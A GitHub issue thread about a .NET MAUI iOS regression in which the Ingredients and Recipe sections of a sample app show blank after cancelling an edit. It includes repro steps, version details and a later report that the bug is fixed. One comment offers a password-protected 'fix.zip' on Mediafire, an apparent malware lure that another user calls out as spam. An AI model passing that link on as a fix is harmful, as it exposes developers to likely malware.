### ISSUE TITLE
[MAUI] From 'Edit recipe' to return to the Recipe details, the 'Ingredients' & 'Recipe' contents appear blank.

### ISSUE THREAD

**Issue by kevinxufei** [dotnet/maui#24434]
### Description

From 'Edit recipe' to return to the Recipe details, the 'Ingredients' & 'Recipe' contents appear blank.

### Steps to Reproduce

1.Installing VS from [Pull request 573712: Insert MAUI .NET 8 SR 8 into into rel/d17.11 - Repos (visualstudio.com)](https://devdiv.visualstudio.com/DevDiv/_git/VS/pullrequest/573712).
2.Download the project https://github.com/rachelkang/recipeSearch and open it in Visual Studio.
3.Deploy to the iOS simulator and Click on the 'My Recipes' tab to navigate to the 'My Recipes' page.
4.Clicking 'Korean Egg Roll' -> 'Edit', then click 'Cancel' button
5.Back to the 'Recipe Details' page, the 'Ingredients' & 'Recipe' contents appear blank.

**Actual result:**Back to the 'Recipe Details' page, the 'Ingredients' & 'Recipe' contents appear blank
![dfsf](https://github.com/user-attachments/assets/2c466d4e-f7ef-4135-a044-ce74be487bcf)

**Expected result:** Everything appears normal.

### Link to public reproduction project repository

https://github.com/rachelkang/recipeSearch

### Version with bug

Microsoft.Maui.Controls 8.0.90-ci.net8.24420.2 & 8.0.80

### Is this a regression from previous behavior?

Yes, this is a regression issue. It works fine on 8.0.80

### Affected platforms
iOS

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CostasAthan** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

It seems that today is they day of spamming malware.

**Comment by kevinxufei** [comment]
Install vs from https://devdiv.visualstudio.com/DevDiv/_git/VS/pullrequest/573712, and deploy to iOS simulator, the issue was fixed and not repro. (Maui version: 8.0.82)
